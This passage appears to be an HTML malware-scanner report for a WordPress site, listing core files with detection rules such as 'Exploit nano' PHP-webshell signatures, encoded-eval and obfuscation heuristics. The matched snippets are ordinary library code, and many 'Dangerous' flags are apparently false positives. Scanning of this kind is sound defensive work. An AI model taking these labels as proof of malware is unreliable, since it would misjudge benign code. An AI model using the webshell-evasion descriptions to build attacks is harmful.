style="color: #0000BB">hash_algos</span><span style="color: #007700">())));&nbsp;}&nbsp;</span><span style="color: #0000BB">$result&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">''</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$hash&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$bytes</span><span style="color: #007700">;&nbsp;switch&nbsp;(</span><span style="color: #0000BB">true</span><span style="color: #007700">)&nbsp;{&nbsp;case&nbsp;</span><span style="color: #0000BB">CRYPT_BASE_WHIRL</span><span style="color: #007700">...</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #DD0000">'$func&nbsp;=&nbsp;function&nbsp;($_action,&nbsp;&amp;$self,&nbsp;$_text)&nbsp;{&nbsp;'&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$init_crypt&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'if&nbsp;($_action&nbsp;==&nbsp;"encrypt")&nbsp;{&nbsp;'&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$encrypt&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'&nbsp;}&nbsp;else&nbsp;{&nbsp;'&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$decrypt&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'&nbsp;}&nbsp;};'</span><span style="color: #007700">);&nbsp;return&nbsp;</span><span style="color: #0000BB">$func</span><span style="color: #007700">;&nbsp;}&nbsp;return&nbsp;</span><span style="color: #0000BB">create_function</span><span style="color: #007700">(</span><span style="color: #DD0000">'$_action,&nbsp;&amp;$self,&nbsp;$_text'</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$init_crypt&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'if&nbsp;($_action&nbsp;==&nbsp;"encrypt")&nbsp;{&nbsp;'&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$encrypt&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'&nbsp;}&nbsp;else&nbsp;{&nbsp;'&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$decrypt&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'&nbsp;}'</span><span style="color: #007700">);&nbsp;}&nbsp;function&nbsp;&amp;</span><span style="color: #0000BB">_getLambdaFunctions</span><span style="color: #007700">()&nbsp;{&nbsp;static&nbsp;</span><span style="color: #0000BB">$functions&nbsp;</span><span style="color: #007700">=&nbsp;array();&nbsp;return&nbsp;</span><span style="color: #0000BB">$functions</span><span style="color: #007700">;&nbsp;}&nbsp;function&nbsp;</span><span style="color: #0000BB">_hashInlineCryptFunction</span><span style="color: #007700">(</span><span style="color: #0000BB">$bytes</span><span style="color: #007700">)&nbsp;{&nbsp;if&nbsp;(!</span><span style="color: #0000BB">defined</span><span style="color: #007700">(</span><span style="color: #DD0000">'CRYPT_BASE_WHIRLPOOL_AVAILABLE'</span><span style="color: #007700">))&nbsp;{&nbsp;</span><span style="color: #0000BB">define</span><span style="color: #007700">(</span><span style="color: #DD0000">'CR...</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_114").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/Новый каталог/dup-installer/classes/config/class.constants.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 5.53 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:18</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:49</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_115" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Sign 471b95ee <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 96</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 471b95ee)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">suhosin</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_115").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/Новый каталог/wp-admin/includes/class-wp-filesystem-ssh2.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 13.43 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:07</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:49</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span><br><table id="file_116" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function posix_getpwuid <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `posix_getpwuid`</p><p><i>[<a href="https://www.php.net/posix_getpwuid" target="_blank" class="text-primary">https://www.php.net/posix_getpwuid</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">posix_getpwuid</span><span style="color: #007700">(</span><span style="color: #0000BB">$owneruid</span><span style="color: #007700">);&nbsp;return&nbsp;</span><span style="color: #0000BB">$ownerarray</span><span style="color: #007700">[</span><span style="color: #DD0000">'name'</span><span style="color: #007700">];&nbsp;}&nbsp;public&nbsp;function&nbsp;</span><span style="color: #0000BB">getchmod</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">)&nbsp;{&nbsp;return&nbsp;</span><span style="color: #0000BB">substr</span><span style="color: #007700">(&nbsp;</span><span style="color: #0000BB">decoct</span><span style="color: #007700">(&nbsp;@</span><span style="color: #0000BB">fileperms</span><span style="color: #007700">(&nbsp;</span><span style="color: #DD0000">'ssh2.sftp://'&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">sftp_link&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'/'&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">ltrim</span><span style="color: #007700">(&nbsp;</span><span style="color: #0000BB">$file</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'/'&nbsp;</span><span style="color: #007700">)&nbsp;)&nbsp;),&nbsp;-</span><span style="color: #0000BB">3&nbsp;</span><span style="color: #007700">);&nbsp;}&nbsp;public&nbsp;function&nbsp;</span><span style="color: #0000BB">group</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">)&nbsp;{&nbsp;</span><span style="color: #0000BB">$gid&nbsp;</span><span style="color: #007700">=&nbsp;@</span><span style="color: #0000BB">filegroup</span><span style="color: #007700">(</span><span style="color: #DD0000">'ssh2.sftp://'&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">sftp_link&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'/'&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">ltrim</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'/'</span><span style="color: #007700">));&nbsp;if&nbsp;(&nbsp;!&nbsp;</span><span style="color: #0000BB">$gid&nbsp;</span><span style="color: #007700">)&nbsp;return&nbsp;</span><span style="color: #0000BB">false</span><span style="color: #007700">;&nbsp;if&nbsp;(&nbsp;!&nbsp;</span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'posix_getgrgid'</span><span style="color: #007700">)&nbsp;)&nbsp;return&nbsp;</span><span style="color: #0000BB">$gid</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$grouparray&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">posix_getgrgid</span><span style="color: #007700">(</span><span style="color: #0000BB">$gid</span><span style="color: #007700">);&nbsp;return&nbsp;</span><span style="color: #0000BB">$grouparray</span><span style="color: #007700">[</span><span style="color: #DD0000">'name'</span><span style="color: #007700">];&nbsp;}&nbsp;public&nbsp;function&nbsp;</span><span style="color: #0000BB">copy</span><span style="color: #007700">(</span><span style="color: #0000BB">$source</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$destina</span><span style="color: #007700">...</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_116").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/Новый каталог/wp-admin/includes/file.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 48.00 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:07</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:49</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_117" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit nano <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 211</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient</p><p><i>[<a href="https://github.com/s0md3v/nano" target="_blank" class="text-primary">https://github.com/s0md3v/nano</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$overrides</span><span style="color: #007700">[</span><span style="color: #DD0000">'upload_error_handler'</span><span style="color: #007700">](&amp;</span><span style="color: #0000BB">$file</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$message&nbsp;</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_117").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/Новый каталог/wp-admin/includes/class-pclzip.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 191.03 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:07</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:49</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 5</span><br><table id="file_118" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit nano <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2622</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient</p><p><i>[<a href="https://github.com/s0md3v/nano" target="_blank" class="text-primary">https://github.com/s0md3v/nano</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$p_options</span><span style="color: #007700">[</span><span style="color: #0000BB">PCLZIP_CB_PRE_ADD</span><span style="color: #007700">](</span><span style="color: #0000BB">PCLZIP_CB_PRE_ADD</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$v_local_header</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit nano <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2775</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient</p><p><i>[<a href="https://github.com/s0md3v/nano" target="_blank" class="text-primary">https://github.com/s0md3v/nano</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$p_options</span><span style="color: #007700">[</span><span style="color: #0000BB">PCLZIP_CB_POST_ADD</span><span style="color: #007700">](</span><span style="color: #0000BB">PCLZIP_CB_POST_ADD</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$v_local_header</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit nano <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3697</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient</p><p><i>[<a href="https://github.com/s0md3v/nano" target="_blank" class="text-primary">https://github.com/s0md3v/nano</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$p_options</span><span style="color: #007700">[</span><span style="color: #0000BB">PCLZIP_CB_PRE_EXTRACT</span><span style="color: #007700">](</span><span style="color: #0000BB">PCLZIP_CB_PRE_EXTRACT</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$v_local_header</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit nano <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3943</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient</p><p><i>[<a href="https://github.com/s0md3v/nano" target="_blank" class="text-primary">https://github.com/s0md3v/nano</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$p_options</span><span style="color: #007700">[</span><span style="color: #0000BB">PCLZIP_CB_POST_EXTRACT</span><span style="color: #007700">](</span><span style="color: #0000BB">PCLZIP_CB_POST_EXTRACT</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$v_local_header</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 963e968a <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5672</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 963e968a)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">php_uname</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_118").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/Новый каталог/wp-admin/includes/class-wp-filesystem-direct.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 10.91 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:07</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:49</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span><br><table id="file_119" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function posix_getpwuid <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `posix_getpwuid`</p><p><i>[<a href="https://www.php.net/posix_getpwuid" target="_blank" class="text-primary">https://www.php.net/posix_getpwuid</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">posix_getpwuid</span><span style="color: #007700">(</span><span style="color: #0000BB">$owneruid</span><span style="color: #007700">);&nbsp;return&nbsp;</span><span style="color: #0000BB">$ownerarray</span><span style="color: #007700">[</span><span style="color: #DD0000">'name'</span><span style="color: #007700">];&nbsp;}&nbsp;public&nbsp;function&nbsp;</span><span style="color: #0000BB">getchmod</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">)&nbsp;{&nbsp;return&nbsp;</span><span style="color: #0000BB">substr</span><span style="color: #007700">(&nbsp;</span><span style="color: #0000BB">decoct</span><span style="color: #007700">(&nbsp;@</span><span style="color: #0000BB">fileperms</span><span style="color: #007700">(&nbsp;</span><span style="color: #0000BB">$file&nbsp;</span><span style="color: #007700">)&nbsp;),&nbsp;-</span><span style="color: #0000BB">3&nbsp;</span><span style="color: #007700">);&nbsp;}&nbsp;public&nbsp;function&nbsp;</span><span style="color: #0000BB">group</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">)&nbsp;{&nbsp;</span><span style="color: #0000BB">$gid&nbsp;</span><span style="color: #007700">=&nbsp;@</span><span style="color: #0000BB">filegroup</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">);&nbsp;if&nbsp;(&nbsp;!&nbsp;</span><span style="color: #0000BB">$gid&nbsp;</span><span style="color: #007700">)&nbsp;return&nbsp;</span><span style="color: #0000BB">false</span><span style="color: #007700">;&nbsp;if&nbsp;(&nbsp;!&nbsp;</span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'posix_getgrgid'</span><span style="color: #007700">)&nbsp;)&nbsp;return&nbsp;</span><span style="color: #0000BB">$gid</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$grouparray&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">posix_getgrgid</span><span style="color: #007700">(</span><span style="color: #0000BB">$gid</span><span style="color: #007700">);&nbsp;return&nbsp;</span><span style="color: #0000BB">$grouparray</span><span style="color: #007700">[</span><span style="color: #DD0000">'name'</span><span style="color: #007700">];&nbsp;}&nbsp;public&nbsp;function&nbsp;</span><span style="color: #0000BB">copy</span><span style="color: #007700">(</span><span style="color: #0000BB">$source</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$destination</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$overwrite&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">false</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$mode&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">false</span><span style="color: #007700">)&nbsp;{&nbsp;if&nbsp;(&nbsp;!&nbsp;</span><span style="color: #0000BB">$overwrite&nbsp;</span><span style="color: #007700">&amp;&amp;&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">exists</span><span style="color: #007700">(</span><span style="color: #0000BB">$destination</span><span style="color: #007700">)&nbsp;)&nbsp;return&nbsp;</span><span style="color: #0000BB">false</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$r</span><span style="color: #007700">...</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_119").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/Новый каталог/wp-admin/includes/ms.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 33.09 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:07</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:49</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_120" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function str_rot13 eval_str_rot13 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 579</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Encoded Function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">riny</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_120").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/Новый каталог/wp-includes/ID3/module.audio-video.quicktime.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 115.66 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:08</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:53</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_121" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function str_rot13 eval_str_rot13 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1560</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Encoded Function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">riny</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_121").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/Новый каталог/wp-includes/pluggable.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 77.25 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:07</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:53</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_122" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Sign 11413268 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1070</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 11413268)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">exploit</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_122").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/Новый каталог/wp-includes/class-snoopy.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 36.89 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:08</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:53</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span><br><table id="file_123" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function exec <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `exec`</p><p><i>[<a href="https://www.php.net/exec" target="_blank" class="text-primary">https://www.php.net/exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">exec</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">curl_path</span><span style="color: #007700">.</span><span style="color: #DD0000">"&nbsp;-k&nbsp;-D&nbsp;\"</span><span style="color: #0000BB">$headerfile</span><span style="color: #DD0000">\""</span><span style="color: #007700">.</span><span style="color: #0000BB">$cmdline_params</span><span style="color: #007700">.</span><span style="color: #DD0000">"&nbsp;\""</span><span style="color: #007700">.</span><span style="color: #0000BB">escapeshellcmd</span><span style="color: #007700">(</span><span style="color: #0000BB">$URI</span><span style="color: #007700">).</span><span style="color: #DD0000">"\""</span><span style="color: #007700">,</span><span style="color: #0000BB">$results</span><span style="color: #007700">,</span><span style="color: #0000BB">$return</span><span style="color: #007700">);&nbsp;if(</span><span style="color: #0000BB">$return</span><span style="color: #007700">)&nbsp;{&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">error&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">"Error:&nbsp;cURL&nbsp;could&nbsp;not&nbsp;retrieve&nbsp;the&nbsp;document,&nbsp;error&nbsp;</span><span style="color: #0000BB">$return</span><span style="color: #DD0000">."</span><span style="color: #007700">;&nbsp;return&nbsp;</span><span style="color: #0000BB">false</span><span style="color: #007700">;&nbsp;}&nbsp;</span><span style="color: #0000BB">$results&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">implode</span><span style="color: #007700">(</span><span style="color: #DD0000">"\r\n"</span><span style="color: #007700">,</span><span style="color: #0000BB">$results</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$result_headers&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">file</span><span style="color: #007700">(</span><span style="color: #DD0000">"</span><span style="color: #0000BB">$headerfile</span><span style="color: #DD0000">"</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">_redirectaddr&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">false</span><span style="color: #007700">;&nbsp;unset(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">headers</span><span style="color: #007700">);&nbsp;for(</span><span style="color: #0000BB">$currentHeader&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">0</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$currentHeader&nbsp;</span><span style="color: #007700">&lt;&nbsp;</span><span style="color: #0000BB">count</span><span style="color: #007700">(</span><span style="color: #0000BB">$result_headers</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$currentHeader</span><span style="color: #007700">++)&nbsp;{&nbsp;if(</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span><span style="color: #DD0000">"/^(Location:&nbsp;|URI:&nbsp;)/i"</span><span style="color: #007700">,</span><span style="color: #0000BB">$result_headers</span><span style="color: #007700">[</span><span style="color: #0000BB">$currentH</span><span style="color: #007700">...</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_123").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/Новый каталог/wp-includes/SimplePie/Parse/Date.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 19.22 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:07</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:53</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span><br><table id="file_124" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit concat_vars_with_spaces <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 786</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Concatenation of vars technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$day&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$fws&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$month&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$fws&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$year&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$fws&nbsp;</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_124").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/Новый каталог/wp-includes/kses.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 47.60 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:08</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:53</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_125" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Sign 1414e381 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 905</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 